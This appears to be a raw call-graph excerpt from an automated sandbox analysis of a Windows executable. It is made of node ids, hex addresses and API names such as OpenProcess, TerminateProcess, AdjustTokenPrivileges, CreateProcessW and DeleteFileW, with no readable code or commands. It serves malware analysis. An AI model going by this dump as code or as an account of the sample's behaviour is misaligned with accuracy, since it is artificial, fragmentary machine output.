af03f 98530->98531 98532 94148 66 API calls 98531->98532 98533 af050 98532->98533 98534 af086 OpenProcess 98533->98534 98540 af055 98533->98540 98535 af149 TerminateProcess 98534->98535 98536 af0a0 GetLastError 98534->98536 98537 af18b CloseHandle 98535->98537 98538 af156 GetLastError 98535->98538 98539 af0ab 98536->98539 98546 af115 98536->98546 98537->98540 98547 af16a 98538->98547 98760 93aa0 63 API calls Mailbox 98539->98760 98540->98381 98542 af0b9 98761 89399 62 API calls Mailbox 98542->98761 98544 af0c3 98545 af0c7 OpenProcess 98544->98545 98549 af0d9 98544->98549 98545->98549 98546->98535 98546->98540 98547->98537 98762 88de9 AdjustTokenPrivileges CloseHandle 98549->98762 98550 af113 98550->98546 98763 ad1c6 98551->98763 98553 ae61c 98553->98381 98555 34d37 84 API calls 98554->98555 98556 9c286 98555->98556 98887 94005 98556->98887 98558 9c28e 98559 9c292 GetLastError 98558->98559 98560 9c2a7 98558->98560 98559->98560 98560->98381 99002 b65c1 98561->99002 98563 b64c0 98564 3bc70 295 API calls 98563->98564 98565 b64eb 98564->98565 98566 3523c 59 API calls 98565->98566 98567 b6503 98566->98567 98567->98381 98569 3502b 59 API calls 98568->98569 98570 3e381 98569->98570 98571 3e385 timeGetTime 98570->98571 98572 3e3bc Sleep 98570->98572 98573 3502b 59 API calls 98571->98573 98574 3e3b4 98572->98574 98575 3e39b 98573->98575 98574->98381 98576 3bc70 293 API calls 98575->98576 98576->98574 98578 3c46d 98577->98578 99024 502d4 InternetCloseHandle InternetCloseHandle WaitForSingleObject 98577->99024 98580 3c2b6 98578->98580 98581 745dc 98578->98581 98580->98311 98584 3c483 98580->98584 99025 977eb 7 API calls Mailbox 98581->99025 99026 977eb 7 API calls Mailbox 98581->99026 98585 41a36 59 API calls 98584->98585 98586 3c4ad 98585->98586 98587 33ea3 68 API calls 98586->98587 98588 3c4c2 Mailbox 98587->98588 98589 41a36 59 API calls 98588->98589 98590 3c4ef 98589->98590 98591 33ea3 68 API calls 98590->98591 98594 3c500 Mailbox 98591->98594 98592 3c524 98592->98318 98594->98592 99027 35376 60 API calls 98594->99027 99028 8700c 295 API calls 98594->99028 98597 9587d 98596->98597 98598 9580c 98596->98598 98597->98381 98599 9580e Sleep 98598->98599 98601 95817 QueryPerformanceCounter 98598->98601 98599->98597 98601->98599 98602 95825 QueryPerformanceFrequency 98601->98602 98603 9582f Sleep QueryPerformanceCounter 98602->98603 98604 95870 98603->98604 98604->98603 98605 95874 98604->98605 98605->98597 98606->98381 98608 41a45 __NMSG_WRITE _memmove 98607->98608 98609 50fe6 Mailbox 59 API calls 98608->98609 98610 41a83 98609->98610 98610->98366 98611->98381 98612->98319 98613->98319 98614->98319 98615->98381 98616->98381 98617->98381 98619 34d51 98618->98619 98628 34d4b 98618->98628 98620 34d99 98619->98620 98622 34d57 __itow 98619->98622 98623 6db28 __i64tow 98619->98623 98624 6da2f 98619->98624 99029 538c8 83 API calls 2 library calls 98620->99029 98626 50fe6 Mailbox 59 API calls 98622->98626 98623->98623 98629 50fe6 Mailbox 59 API calls 98624->98629 98634 6daa7 Mailbox _wcscpy 98624->98634 98627 34d71 98626->98627 98627->98628 98630 41a36 59 API calls 98627->98630 98628->98381 98631 6da74 98629->98631 98630->98628 98632 50fe6 Mailbox 59 API calls 98631->98632 98633 6da9a 98632->98633 98633->98634 98635 41a36 59 API calls 98633->98635 99030 538c8 83 API calls 2 library calls 98634->99030 98635->98634 98636->98381 98637->98381 98638->98360 98639->98360 98640->98360 98642 ac39a 98641->98642 98643 ac380 98641->98643 99031 aa8fd 98642->99031 99058 9a48d 89 API calls 4 library calls 98643->99058 98647 353b0 294 API calls 98648 ac406 98647->98648 98649 ac498 98648->98649 98652 ac447 98648->98652 98658 ac392 Mailbox 98648->98658 98650 ac4ee 98649->98650 98651 ac49e 98649->98651 98653 34d37 84 API calls 98650->98653 98650->98658 99059 97ed5 59 API calls 98651->99059 98656 9789a 59 API calls 98652->98656 98654 ac500 98653->98654 98657 41aa4 59 API calls 98654->98657 98661 ac477 98656->98661 98662 ac524 CharUpperBuffW 98657->98662 98658->98381 98659 ac4c1 99060 435b9 59 API calls Mailbox 98659->99060 98664 86ebc 294 API calls 98661->98664 98665 ac53e 98662->98665 98663 ac4c9 Mailbox 98668 3b020 294 API calls 98663->98668 98664->98658 98666 ac591 98665->98666 98667 ac545 98665->98667 98669 34d37 84 API calls 98666->98669 99038 9789a 98667->99038 98668->98658 98670 ac599 98669->98670 99061 35376 60 API calls 98670->99061 98675 ac5a3 98675->98658 98676 34d37 84 API calls 98675->98676 98677 ac5be 98676->98677 99062 435b9 59 API calls Mailbox 98677->99062 98679 ac5ce 98680 3b020 294 API calls 98679->98680 98680->98658 98681->98381 98682->98360 99097 94ce2 98683->99097 98685 94195 Process32NextW 98686 94244 FindCloseChangeNotification 98685->98686 98692 9418e Mailbox 98685->98692 98686->98360 98687 41207 59 API calls 98687->98692 98688 41a36 59 API calls 98688->98692 98689 50119 59 API calls 98689->98692 98692->98685 98692->98686 98692->98687 98692->98688 98692->98689 99103 417e0 59 API calls Mailbox 98692->99103 99104 4151f 61 API calls 98692->99104 98694 335e2 98693->98694 98696 335b0 98693->98696 98694->98467 98695 335d5 IsDialogMessageW 98695->98694 98695->98696 98696->98694 98696->98695 98697 6d273 GetClassLongW 98696->98697 98697->98695 98697->98696 98699 353b0 295 API calls 98698->98699 98700 3951f 98699->98700 98701 72001 98700->98701 98715 39527 _memmove 98700->98715 98702 35190 Mailbox 59 API calls 98701->98702 98707 39944 98702->98707 98703 722c0 98746 9a48d 89 API calls 4 library calls 98703->98746 98705 722de 98705->98705 98706 39583 98706->98478 98709 50fe6 Mailbox 59 API calls 98707->98709 98708 3986a 98710 722b1 98708->98710 98711 3987f 98708->98711 98722 396e3 _memmove 98709->98722 98745 aa983 59 API calls 98710->98745 98713 50fe6 Mailbox 59 API calls 98711->98713 98725 3977d 98713->98725 98714 50fe6 59 API calls Mailbox 98714->98715 98715->98703 98715->98706 98715->98707 98715->98714 98716 396cf 98715->98716 98731 39741 98715->98731 98716->98707 98718 396dc 98716->98718 98717 50fe6 Mailbox 59 API calls 98720 3970e 98717->98720 98719 50fe6 Mailbox 59 API calls 98718->98719 98719->98722 98720->98731 98733 3cca0 98720->98733 98721 722a0 98744 9a48d 89 API calls 4 library calls 98721->98744 98722->98717 98722->98720 98722->98731 98725->98478 98727 72278 98743 9a48d 89 API calls 4 library calls 98727->98743 98729 72253 98742 9a48d 89 API calls 4 library calls 98729->98742 98731->98708 98731->98721 98731->98725 98731->98727 98731->98729 98741 38180 295 API calls 98731->98741 98732->98480 98734 3cd02 98733->98734 98735 3ccda 98733->98735 98737 74971 98734->98737 98738 353b0 295 API calls 98734->98738 98739 3cce0 98734->98739 98736 39c80 295 API calls 98735->98736 98735->98739 98736->98739 98737->98739 98747 9a48d 89 API calls 4 library calls 98737->98747 98738->98737 98739->98731 98739->98739 98741->98731 98742->98725 98743->98725 98744->98725 98745->98703 98746->98705 98747->98739 98748->98510 98749->98510 98750->98510 98751->98510 98752->98510 98753->98505 98754->98510 98755->98526 98756->98515 98757->98526 98758->98525 98759->98526 98760->98542 98761->98544 98762->98550 98764 34d37 84 API calls 98763->98764 98765 ad203 98764->98765 98769 ad24a Mailbox 98765->98769 98801 ade8e 98765->98801 98767 ad617 98851 adfb1 92 API calls Mailbox 98767->98851 98769->98553 98771 ad626 98773 ad4b0 98771->98773 98774 ad632 98771->98774 98772 ad29b Mailbox 98772->98769 98775 34d37 84 API calls 98772->98775 98788 ad4a2 98772->98788 98834 9fc0d 59 API calls 2 library calls 98772->98834 98835 ad6c8 61 API calls 2 library calls 98772->98835 98814 ad057 98773->98814 98774->98769 98775->98772 98780 ad4e9 98829 50e38 98780->98829 98783 ad51c 98837 347be 98783->98837 98784 ad503 98836 9a48d 89 API calls 4 library calls 98784->98836 98787 ad50e GetCurrentProcess TerminateProcess 98787->98783 98788->98767 98788->98773 98792 ad68d 98792->98769 98796 ad6a1 FreeLibrary 98792->98796 98794 ad554 98849 add32 107 API calls _free 98794->98849 98796->98769 98799 3523c 59 API calls 98800 ad565 98799->98800 98800->98792 98800->98799 98850 34230 59 API calls Mailbox 98800->98850 98852 add32 107 API calls _free 98800->98852 98802 41aa4 59 API calls 98801->98802 98803 adea9 CharLowerBuffW 98802->98803 98853 8f903 98803->98853 98807 41207 59 API calls 98808 adee2 98807->98808 98860 41462 98808->98860 98810 adf41 Mailbox 98810->98772 98811 adef9 98812 41981 59 API calls 98811->98812 98813 adf05 Mailbox 98812->98813 98813->98810 98873 ad6c8 61 API calls 2 library calls 98813->98873 98815 ad0c7 98814->98815 98816 ad072 98814->98816 98820 ae139 98815->98820 98817 50fe6 Mailbox 59 API calls 98816->98817 98819 ad094 98817->98819 98818 50fe6 Mailbox 59 API calls 98818->98819 98819->98815 98819->98818 98821 ae362 Mailbox 98820->98821 98828 ae15c _strcat _wcscpy __NMSG_WRITE 98820->98828 98821->98780 98822 35087 59 API calls 98822->98828 98823 3502b 59 API calls 98823->98828 98824 350d5 59 API calls 98824->98828 98825 34d37 84 API calls 98825->98828 98826 5593c 58 API calls __malloc_crt 98826->98828 98828->98821 98828->98822 98828->98823 98828->98824 98828->98825 98828->98826 98877 95e42 61 API calls 2 library calls 98828->98877 98830 50e4d 98829->98830 98831 50ee5 CreateProcessW 98830->98831 98832 50eb3 98830->98832 98833 50ed3 FindCloseChangeNotification 98830->98833 98831->98832 98832->98783 98832->98784 98833->98832 98834->98772 98835->98772 98836->98787 98838 347c6 98837->98838 98839 50fe6 Mailbox 59 API calls 98838->98839 98840 347d4 98839->98840 98841 347e0 98840->98841 98878 346ec 59 API calls Mailbox 98840->98878 98843 34540 98841->98843 98879 34650 98843->98879 98845 3454f 98846 50fe6 Mailbox 59 API calls 98845->98846 98847 345eb 98845->98847 98846->98847 98847->98800 98848 34230 59 API calls Mailbox 98847->98848 98848->98794 98849->98800 98850->98800 98851->98771 98852->98800 98854 8f92e __NMSG_WRITE 98853->98854 98855 8f96d 98854->98855 98858 8f963 98854->98858 98859 8fa14 98854->98859 98855->98807 98855->98813 98858->98855 98874 414db 61 API calls 98858->98874 98859->98855 98875 414db 61 API calls 98859->98875 98861 41471 98860->98861 98862 414ce 98860->98862 98861->98862 98864 4147c 98861->98864 98863 41981 59 API calls 98862->98863 98869 4149f _memmove 98863->98869 98865 41497 98864->98865 98866 7f1de 98864->98866 98876 41b7c 59 API calls Mailbox 98865->98876 98868 41c7e 59 API calls 98866->98868 98870 7f1e8 98868->98870 98869->98811 98871 50fe6 Mailbox 59 API calls 98870->98871 98872 7f208 98871->98872 98873->98810 98874->98858 98875->98859 98876->98869 98877->98828 98878->98841 98880 34659 Mailbox 98879->98880 98881 6d6ec 98880->98881 98886 34663 98880->98886 98882 50fe6 Mailbox 59 API calls 98881->98882 98884 6d6f8 98882->98884 98883 3466a 98883->98845 98885 35190 Mailbox 59 API calls 98885->98886 98886->98883 98886->98885 98888 41207 59 API calls 98887->98888 98889 94024 98888->98889 98890 41207 59 API calls 98889->98890 98891 9402d 98890->98891 98892 41207 59 API calls 98891->98892 98893 94036 98892->98893 98912 50284 98893->98912 98898 9405c 98924 50119 98898->98924 98901 94070 FindFirstFileW 98902 940fc FindClose 98901->98902 98903 9408f 98901->98903 98908 94107 Mailbox 98902->98908 98903->98902 98906 94093 98903->98906 98904 940d7 FindNextFileW 98904->98903 98904->98906 98905 41c9c 59 API calls 98905->98906 98906->98903 98906->98904 98906->98905 98909 41900 59 API calls 98906->98909 98982 417e0 59 API calls Mailbox 98906->98982 98908->98558 98910 940c8 DeleteFileW 98909->98910 98910->98904 98911 940f3 FindClose 98910->98911 98911->98908 98983 61b70 98912->98983 98915 502b0 98918 41821 59 API calls 98915->98918 98916 502cd 98989 419e1 98916->98989 98919 502bc 98918->98919 98985 4133d 98919->98985 98922 94fec GetFileAttributesW 98923 9404a 98922->98923 98923->98898 98975 41900 98923->98975 98925 41207 59 API calls 98924->98925 98926 5012f 98925->98926 98927 41207 59 API calls 98926->98927 98928 50137 98927->98928 98929 41207 59 API calls 98928->98929 98930 5013f 98929->98930 98931 41207 59 API calls 98930->98931 98932 50147 98931->98932 98933 8627d 98932->98933 98934 5017b 98932->98934 98935 41c9c 59 API calls 98933->98935 98936 41462 59 API calls 98934->98936 98937 86286 98935->98937 98938 50189 98936->98938 98939 419e1 59 API calls 98937->98939 98940 41981 59 API calls 98938->98940 98942 501be 98939->98942 98941 50193 98940->98941 98941->98942 98943 41462 59 API calls 98941->98943 98945 501dd 98942->98945 98946 862a6 98942->98946 98961 501fe 98942->98961 98947 501b4 98943->98947 98944 41462 59 API calls 98948 5020f 98944->98948 98993 41609 98945->98993 98949 86376 98946->98949 98959 8635f 98946->98959 98968 862dd 98946->98968 98950 41981 59 API calls 98947->98950 98954 41c9c 59 API calls 98948->98954 98956 50221 98948->98956 98952 41821 59 API calls 98949->98952 98950->98942 98970 86333 98952->98970 98954->98956 98955 50231 98960 50238 98955->98960 98962 41c9c 59 API calls 98955->98962 98956->98955 98958 41c9c 59 API calls 98956->98958 98957 41462 59 API calls 98957->98961 98958->98955 98959->98949 98964 8634a 98959->98964 98963 41c9c 59 API calls 98960->98963 98972 5023f Mailbox 98960->98972 98961->98944 98962->98960 98963->98972 98966 41821 59 API calls 98964->98966 98965 8633b 98967 41821 59 API calls 98965->98967 98966->98970 98967->98970 98968->98965 98973 86326 98968->98973 98969 41609 59 API calls 98969->98970 98970->98961 98970->98969 98996 4153b 59 API calls 2 library calls 98970->98996 98972->98901 98974 41821 59 API calls 98973->98974 98974->98970 98976 41914 98975->98976 98977 7f534 98975->98977 98997 418a5 98976->98997 98979 41c7e 59 API calls 98977->98979 98981 7f53f __NMSG_WRITE _memmove 98979->98981 98980 4191f 98980->98898 98982->98906 98984 50291 GetFullPathNameW 98983->98984 98984->98915 98984->98916 98986 4134b 98985->98986 98987 41981 59 API calls 98986->98987 98988 4135b 98987->98988 98988->98922 98990 419ee 98989->98990 98991 419fb 98989->98991 98990->98919 98992 50fe6 Mailbox 59 API calls 98991->98992 98992->98990 98994 41aa4 59 API calls 98993->98994 98995 41614 98994->98995 98995->98957 98995->98961 98996->98970 98998 418b4 __NMSG_WRITE 98997->98998 98999 418c5 _memmove 98998->98999 99000 41c7e 59 API calls 98998->99000 98999->98980 99001 7f4f1 _memmove 99000->99001 99008 36de9 99002->99008 99005 b65e2 timeGetTime 99005->98563 99009 3523c 59 API calls 99008->99009 99010 36e03 99009->99010 99011 6f40f 99010->99011 99012 36e0d 99010->99012 99014 41821 59 API calls 99011->99014 99013 34d37 84 API calls 99012->99013 99015 36e1a 99013->99015 99016 6f41f 99014->99016 99017 41c9c 59 API calls 99015->99017 99016->99016 99018 36e28 99017->99018 99018->99005 99019 3502b 99018->99019 99020 35041 99019->99020 99021 3503c 99019->99021 99020->99005 99021->99020 99023 537ba 59 API calls 99021->99023 99023->99020 99024->98578 99025->98578 99026->98578 99027->98594 99028->98594 99029->98622 99030->98623 99032 aa918 99031->99032 99033 aa970 99031->99033 99034 50fe6 Mailbox 59 API calls 99032->99034 99033->98647 99037 aa93a 99034->99037 99035 50fe6 Mailbox 59 API calls 99035->99037 99037->99033 99037->99035 99063 8715b 59 API calls Mailbox 99037->99063 99039 978ac 99038->99039 99040 978e3 99038->99040 99039->99040 99041 50fe6 Mailbox 59 API calls 99039->99041 99042 86ebc 99040->99042 99041->99040 99043 86f1c Mailbox 99042->99043 99044 86f06 99042->99044 99046 86f5a 99043->99046 99047 86f47 99043->99047 99045 41a36 59 API calls 99044->99045 99045->99043 99049 3a820 295 API calls 99046->99049 99048 ac355 295 API calls 99047->99048 99050 86f53 99048->99050 99053 86f91 99049->99053 99071 86cf1 59 API calls Mailbox 99050->99071 99052 87002 99052->98658 99053->99050 99054 86fdc 99053->99054 99056 86fc1 99053->99056 99054->99050 99070 9a48d 89 API calls 4 library calls 99054->99070 99064 8706d 99056->99064 99058->98658 99059->98659 99060->98663 99061->98675 99062->98679 99063->99037 99065 87085 99064->99065 99072 a495b 99065->99072 99081 9413a 99065->99081 99084 af1b2 99065->99084 99066 870d9 99066->99050 99070->99050 99071->99052 99073 50fe6 Mailbox 59 API calls 99072->99073 99074 a496c 99073->99074 99089 4433f 99074->99089 99077 34d37 84 API calls 99078 a498d GetEnvironmentVariableW 99077->99078 99092 97a51 59 API calls Mailbox 99078->99092 99080 a49aa 99080->99066 99093 9494a GetFileAttributesW 99081->99093 99085 34d37 84 API calls 99084->99085 99086 af1cf 99085->99086 99087 94148 66 API calls 99086->99087 99088 af1de 99087->99088 99088->99066 99090 50fe6 Mailbox 59 API calls 99089->99090 99091 44351 99090->99091 99091->99077 99092->99080 99094 9413f 99093->99094 99095 94965 FindFirstFileW 99093->99095 99094->99066 99095->99094 99096 9497a FindClose 99095->99096 99096->99094 99098 94d09 99097->99098 99102 94cf0 99097->99102 99106 537c3 59 API calls __wcstoi64 99098->99106 99101 94d0f 99101->98692 99102->99098 99102->99101 99105 5385c GetStringTypeW _iswctype 99102->99105 99103->98692 99104->98692 99105->99102 99106->99101 99108 33b3f 99107->99108 99114 33b67 99107->99114 99109 33b4d 99108->99109 99111 33b31 59 API calls 99108->99111 99110 33b53 99109->99110 99112 33b31 59 API calls 99109->99112 99113 35190 Mailbox 59 API calls 99110->99113 99110->99114 99111->99109 99112->99110 99113->99114 99114->98395 99115->98390 99116->98402 99118 33c43 99117->99118 99119 33e11 99117->99119 99120 41207 59 API calls 99118->99120 99123 33c54 99118->99123 99119->98415 99121 33e73 99120->99121 99122 52f70 __cinit 67 API calls 99121->99122 99122->99123 99123->98415 99124->98428 99126 36e4a 99125->99126 99128 36ff7 99125->99128 99127 374d0 99126->99127 99126->99128 99130 36f2c 99126->99130 99136 36fdb 99126->99136 99127->99136 99152 349e0 59 API calls __gmtime64_s 99127->99152 99128->99127 99135 37076 99128->99135 99128->99136 99140 36fbb Mailbox 99128->99140 99133 36f68 99130->99133 99130->99135 99130->99136 99132 6fc1e 99137 6fc30 99132->99137 99150 53f69 59 API calls __wtof_l 99132->99150 99133->99136 99133->99140 99141 6fa71 99133->99141 99135->99132 99135->99136 99135->99140 99149 87aad 59 API calls 99135->99149 99136->98452 99137->98452 99140->99132 99140->99136 99151 341c4 59 API calls Mailbox 99140->99151 99141->99136 99148 53f69 59 API calls __wtof_l 99141->99148 99142->98452 99143->98443 99144->98445 99145->98444 99146->98445 99147->98445 99148->99141 99149->99140 99150->99137 99151->99140 99152->99136 99153 57e83 99154 57e8f _flsall 99153->99154 99190 5a038 GetStartupInfoW 99154->99190 99156 57e94 99192 58dac GetProcessHeap 99156->99192 99158 57eec 99159 57ef7 99158->99159 99278 57fd3 58 API calls 3 library calls 99158->99278 99193 59d16 99159->99193 99162 57efd 99163 57f08 __RTC_Initialize 99162->99163 99279 57fd3 58 API calls 3 library calls 99162->99279 99214 5d802 99163->99214 99166 57f17 99167 57f23 GetCommandLineW 99166->99167 99280 57fd3 58 API calls 3 library calls 99166->99280 99233 65153 GetEnvironmentStringsW 99167->99233 99170 57f22 99170->99167 99173 57f3d 99174 57f48 99173->99174 99281 532e5 58 API calls 3 library calls 99173->99281 99243 64f88 99174->99243 99177 57f4e 99178 57f59 99177->99178 99282 532e5 58 API calls 3 library calls 99177->99282 99257 5331f 99178->99257 99181 57f61 99183 57f6c __wwincmdln 99181->99183 99283 532e5 58 API calls 3 library calls 99181->99283 99263 45f8b 99183->99263 99185 57f80 99186 57f8f 99185->99186 99275 53588 99185->99275 99284 53310 58 API calls _doexit 99186->99284 99189 57f94 _flsall 99191 5a04e 99190->99191 99191->99156 99192->99158 99285 533b7 EncodePointer 99193->99285 99195 59d1b 99290 59f6c 99195->99290 99198 59d24 99303 59d8c 61 API calls 2 library calls 99198->99303 99201 59d29 99201->99162 99203 59d41 99297 58a05 99203->99297 99206 59d83 99306 59d8c 61 API calls 2 library calls 99206->99306 99209 59d88 99209->99162 99210 59d62 99210->99206 99211 59d68 99210->99211 99305 59c63 58 API calls 4 library calls 99211->99305 99213 59d70 GetCurrentThreadId 99213->99162 99215 5d80e _flsall 99214->99215 99216 59e3b __lock 58 API calls 99215->99216 99217 5d815 99216->99217 99218 58a05 __calloc_crt 58 API calls 99217->99218 99220 5d826 99218->99220 99219 5d891 GetStartupInfoW 99227 5d8a6 99219->99227 99228 5d9d5 99219->99228 99220->99219 99221 5d831 _flsall @_EH4_CallFilterFunc@8 99220->99221 99221->99166 99222 5da9d 99322 5daad LeaveCriticalSection _doexit 99222->99322 99224 58a05 __calloc_crt 58 API calls 99224->99227 99225 5da22 GetStdHandle 99225->99228 99226 5da35 GetFileType 99226->99228 99227->99224 99227->99228 99229 5d8f4 99227->99229 99228->99222 99228->99225 99228->99226 99321 5a05b InitializeCriticalSectionAndSpinCount 99228->99321 99229->99228 99230 5d928 GetFileType 99229->99230 99320 5a05b InitializeCriticalSectionAndSpinCount 99229->99320 99230->99229 99234 65164 99233->99234 99235 57f33 99233->99235 99323 58a4d 58 API calls __malloc_crt 99234->99323 99239 64d4b GetModuleFileNameW 99235->99239 99237 6518a _memmove 99238 651a0 FreeEnvironmentStringsW 99237->99238 99238->99235 99240 64d7f _wparse_cmdline 99239->99240 99242 64dbf _wparse_cmdline 99240->99242 99324 58a4d 58 API calls __malloc_crt 99240->99324 99242->99173 99244 64fa1 __NMSG_WRITE 99243->99244 99245 64f99 99243->99245 99246 58a05 __calloc_crt 58 API calls 99244->99246 99245->99177 99251 64fca __NMSG_WRITE 99246->99251 99247 65021 99248 52f85 _free 58 API calls 99247->99248 99248->99245 99249 58a05 __calloc_crt 58 API calls 99249->99251 99250 65046 99253 52f85 _free 58 API calls 99250->99253 99251->99245 99251->99247 99251->99249 99251->99250 99254 6505d 99251->99254 99325 64837 58 API calls __woutput_l 99251->99325 99253->99245 99326 58ff6 IsProcessorFeaturePresent 99254->99326 99258 5332b __IsNonwritableInCurrentImage 99257->99258 99349 5a701 99258->99349 99260 53349 __initterm_e 99261 52f70 __cinit 67 API calls 99260->99261 99262 53368 _doexit __IsNonwritableInCurrentImage 99260->99262 99261->99262 99262->99181 99264 45fa5 99263->99264 99265 46044 99263->99265 99266 45fdf IsThemeActive 99264->99266 99265->99185 99352 5359c 99266->99352 99270 4600b 99364 45f00 SystemParametersInfoW SystemParametersInfoW 99270->99364 99272 46017 99365 45240 99272->99365 99274 4601f SystemParametersInfoW 99274->99265 100488 53459 99275->100488 99277 53597 99277->99186 99278->99159 99279->99163 99280->99170 99284->99189 99286 533c8 __init_pointers __initp_misc_winsig 99285->99286 99307 5a754 EncodePointer 99286->99307 99288 533e0 __init_pointers 99289 5a0c9 34 API calls 99288->99289 99289->99195 99291 59f78 99290->99291 99293 59d20 99291->99293 99308 5a05b InitializeCriticalSectionAndSpinCount 99291->99308 99293->99198 99294 59fba 99293->99294 99295 59fd1 TlsAlloc 99294->99295 99296 59d36 99294->99296 99296->99198 99296->99203 99300 58a0c 99297->99300 99299 58a47 99299->99206 99304 5a016 TlsSetValue 99299->99304 99300->99299 99301 58a2a 99300->99301 99309 65426 99300->99309 99301->99299 99301->99300 99317 5a362 Sleep 99301->99317 99303->99201 99304->99210 99305->99213 99306->99209 99307->99288 99308->99291 99310 65431 99309->99310 99314 6544c 99309->99314 99311 6543d 99310->99311 99310->99314 99318 58d58 58 API calls __getptd_noexit 99311->99318 99313 6545c RtlAllocateHeap 99313->99314 99315 65442 99313->99315 99314->99313 99314->99315 99319 535d1 DecodePointer 99314->99319 99315->99300 99317->99301 99318->99315 99319->99314 99320->99229 99321->99228 99322->99221 99323->99237 99324->99242 99325->99251 99327 59001 99326->99327 99332 58e89 99327->99332 99331 5901c 99331->99177 99333 58ea3 _memset ___raise_securityfailure 99332->99333 99334 58ec3 IsDebuggerPresent 99333->99334 99340 5a385 SetUnhandledExceptionFilter UnhandledExceptionFilter 99334->99340 99336 58f87 ___raise_securityfailure 99341 5c826 99336->99341 99338 58faa 99339 5a370 GetCurrentProcess TerminateProcess 99338->99339 99339->99331 99340->99336 99342 5c830 IsProcessorFeaturePresent 99341->99342 99343 5c82e 99341->99343 99345 65b3a 99342->99345 99343->99338 99348 65ae9 5 API calls 2 library calls 99345->99348 99347 65c1d 99347->99338 99348->99347 99350 5a704 EncodePointer 99349->99350 99350->99350 99351 5a71e 99350->99351 99351->99260 99353 59e3b __lock 58 API calls 99352->99353 99354 535a7 DecodePointer EncodePointer 99353->99354 99417 59fa5 LeaveCriticalSection 99354->99417 99356 46004 99357 53604 99356->99357 99358 5360e 99357->99358 99359 53628 99357->99359 99358->99359 99418 58d58 58 API calls __getptd_noexit 99358->99418 99359->99270 99361 53618 99419 58fe6 9 API calls __woutput_l 99361->99419 99363 53623 99363->99270 99364->99272 99366 4524d __write_nolock 99365->99366 99367 41207 59 API calls 99366->99367 99368 45258 GetCurrentDirectoryW 99367->99368 99420 44ec8 99368->99420 99370 4527e IsDebuggerPresent 99371 4528c 99370->99371 99372 80b21 MessageBoxA 99370->99372 99373 80b39 99371->99373 99374 452a0 99371->99374 99372->99373 99543 4314d 59 API calls Mailbox 99373->99543 99488 431bf 99374->99488 99378 80b49 99384 80b5f SetCurrentDirectoryW 99378->99384 99383 4536c Mailbox 99383->99274 99384->99383 99417->99356 99418->99361 99419->99363 99421 41207 59 API calls 99420->99421 99422 44ede 99421->99422 99553 45420 99422->99553 99424 44efc 99425 419e1 59 API calls 99424->99425 99426 44f10 99425->99426 99427 41c9c 59 API calls 99426->99427 99428 44f1b 99427->99428 99567 3477a 99428->99567 99431 41a36 59 API calls 99432 44f34 99431->99432 99433 339be 68 API calls 99432->99433 99434 44f44 Mailbox 99433->99434 99435 41a36 59 API calls 99434->99435 99436 44f68 99435->99436 99437 339be 68 API calls 99436->99437 99438 44f77 Mailbox 99437->99438 99439 41207 59 API calls 99438->99439 99440 44f94 99439->99440 99570 455bc 99440->99570 99444 44fae 99445 80a54 99444->99445 99446 44fb8 99444->99446 99448 455bc 59 API calls 99445->99448 99447 5312d _W_store_winword 60 API calls 99446->99447 99449 44fc3 99447->99449 99450 80a68 99448->99450 99449->99450 99451 44fcd 99449->99451 99452 455bc 59 API calls 99450->99452 99453 5312d _W_store_winword 60 API calls 99451->99453 99454 80a84 99452->99454 99455 44fd8 99453->99455 99457 500cf 61 API calls 99454->99457 99455->99454 99456 44fe2 99455->99456 99458 5312d _W_store_winword 60 API calls 99456->99458 99459 80aa7 99457->99459 99460 44fed 99458->99460 99461 455bc 59 API calls 99459->99461 99462 80ad0 99460->99462 99463 44ff7 99460->99463 99464 80ab3 99461->99464 99466 455bc 59 API calls 99462->99466 99465 4501b 99463->99465 99469 41c9c 59 API calls 99463->99469 99468 41c9c 59 API calls 99464->99468 99473 347be 59 API calls 99465->99473 99467 80aee 99466->99467 99470 41c9c 59 API calls 99467->99470 99471 80ac1 99468->99471 99472 4500e 99469->99472 99475 80afc 99470->99475 99476 455bc 59 API calls 99471->99476 99477 455bc 59 API calls 99472->99477 99474 4502a 99473->99474 99478 34540 59 API calls 99474->99478 99479 455bc 59 API calls 99475->99479 99476->99462 99477->99465 99480 45038 99478->99480 99481 80b0b 99479->99481 99586 343d0 99480->99586 99481->99481 99483 3477a 59 API calls 99485 45055 99483->99485 99484 343d0 59 API calls 99484->99485 99485->99483 99485->99484 99486 455bc 59 API calls 99485->99486 99487 4509b Mailbox 99485->99487 99486->99485 99487->99370 99489 431cc __write_nolock 99488->99489 99490 431e5 99489->99490 99491 80314 _memset 99489->99491 99492 50284 60 API calls 99490->99492 99493 80330 GetOpenFileNameW 99491->99493 99494 431ee 99492->99494 99495 8037f 99493->99495 99605 509c5 99494->99605 99497 41821 59 API calls 99495->99497 99499 80394 99497->99499 99499->99499 99501 43203 99623 4278a 99501->99623 99543->99378 99554 4542d __write_nolock 99553->99554 99555 41821 59 API calls 99554->99555 99564 45590 Mailbox 99554->99564 99557 4545f 99555->99557 99556 41609 59 API calls 99556->99557 99557->99556 99558 45495 Mailbox 99557->99558 99559 45563 99558->99559 99562 41a36 59 API calls 99558->99562 99558->99564 99566 41609 59 API calls 99558->99566 99595 44c94 99558->99595 99560 41a36 59 API calls 99559->99560 99559->99564 99561 45584 99560->99561 99563 44c94 59 API calls 99561->99563 99562->99558 99563->99564 99564->99424 99566->99558 99568 50fe6 Mailbox 59 API calls 99567->99568 99569 34787 99568->99569 99569->99431 99571 455c6 99570->99571 99572 455df 99570->99572 99574 41c9c 59 API calls 99571->99574 99573 41821 59 API calls 99572->99573 99575 44fa0 99573->99575 99574->99575 99576 5312d 99575->99576 99577 531ae 99576->99577 99578 53139 99576->99578 99603 531c0 60 API calls 3 library calls 99577->99603 99585 5315e 99578->99585 99601 58d58 58 API calls __getptd_noexit 99578->99601 99580 531bb 99580->99444 99582 53145 99602 58fe6 9 API calls __woutput_l 99582->99602 99584 53150 99584->99444 99585->99444 99587 6d6c9 99586->99587 99593 343e7 99586->99593 99587->99593 99604 340cb 59 API calls Mailbox 99587->99604 99589 34530 99592 3523c 59 API calls 99589->99592 99590 344e8 99591 50fe6 Mailbox 59 API calls 99590->99591 99594 344ef 99591->99594 99592->99594 99593->99589 99593->99590 99593->99594 99594->99485 99596 44ca2 99595->99596 99600 44cc4 _memmove 99595->99600 99598 50fe6 Mailbox 59 API calls 99596->99598 99597 50fe6 Mailbox 59 API calls 99599 44cd8 99597->99599 99598->99600 99599->99558 99600->99597 99601->99582 99602->99584 99603->99580 99604->99593 99606 61b70 __write_nolock 99605->99606 99607 509d2 GetLongPathNameW 99606->99607 99608 41821 59 API calls 99607->99608 99609 431f7 99608->99609 99610 42f3d 99609->99610 99611 41207 59 API calls 